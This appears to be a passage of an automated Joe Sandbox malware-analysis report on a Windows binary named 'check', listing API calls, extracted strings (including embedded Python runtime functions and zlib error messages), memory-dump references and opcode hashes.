                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF712505839), ref: 00007FF712505957
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF712505839), ref: 00007FF71250596D
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
• GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• CloseHandle.KERNELBASE(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABC6
• GetLastError.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABD0
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF71250B32A,?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A), ref: 00007FF71250EBED
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF712500C90,?,?,?,00007FF7125022FA,?,?,?,?,?,00007FF712503AE9), ref: 00007FF71250D63A
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5840
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5852
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5889
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F589B
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58B4
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58C6
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58DF
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58F1
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F590D
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F591F
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F593B
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F594D
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5969
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F597B
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5997
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59A9
• GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59C5
• GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59D7
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
APIs
Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                          • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                          • Instruction ID: 62dc1c9a0ac26f126dfe4dd81494501eb38754f4a0d8f5749a7047f81e619c3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AB21B72F186828BE725DF64D4807FDBBA1FB44398F842175DA0D57A84DBB8E908CB50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                          • API String ID: 0-2665694366
                                                                                                                                                                                                                                          • Opcode ID: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                          • Instruction ID: 59312a5673b8437bfae7005d95cbe8f064aecb792b3abd7aecc0646fce3d7fda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55880860ec2df9374ed9e05eb7c1f9660e2769407a38999da05ffb99d6c3dc89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24523872A14AA58BD7A49F18C458B7E7BADFB85350F414138EA4A877C0EB7CDC18CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction ID: 6186b7209e92ae963fc60d930f2b6915e0db903a7c216c6a85be89b92cda1950
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A310E76608F8186EB649F64E8803ED6364FB88754F444039DA5E47B94EFB8D55CC710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                          • Instruction ID: 3bf1a1f25aa9ad0b64230c4e9c43a607758a6df312eafa2a824e2fcdefef63d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE31A436608F8186DB20DF24E8802AEB3A4FB88764F900135EE9D43B54EF7CD559CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                          • Instruction ID: d7e84272551ee136cafa65909ef33d5906f65b7565208a58e7ad704d2bae7a00
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDB1D822B18E9241EA60BF2595805B9F791EB44BF4F8491B1DE5D07BC5EFBCE449C320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                          • API String ID: 0-1127688429
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                          • API String ID: 0-227171996
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                          • API String ID: 0-900081337
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                                                                                          • API String ID: 0-1523873471
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: TMP
                                                                                                                                                                                                                                          • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
Memory Dump Source
• Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
• Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmp
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                          • Instruction ID: 113eed16d955efc466ff3a11aa8feeabef00591af83137db4ae5e28fa36e99c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5610862F08A524AFB64AE2894D063DE680AF41770FD502B9D71D43AC5EEEDEC48C730
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction ID: 832e1788fe312f80baffc6314cb31e4eaaab8f92d3f467a5ca40a00845917235
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A51A736A18E5281E7649F29C880238B3A1FB58BB8F644171CE4D87794EF7AEC47C754
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction ID: 643b3da7e17d8907b81654791d86f809596ddf69e6c26f280fccfb1a64ee90c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A451A836E18E5186E7249F29C480238B7A0EB44B78F64C171CE8D17794EF7AE847C7A5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
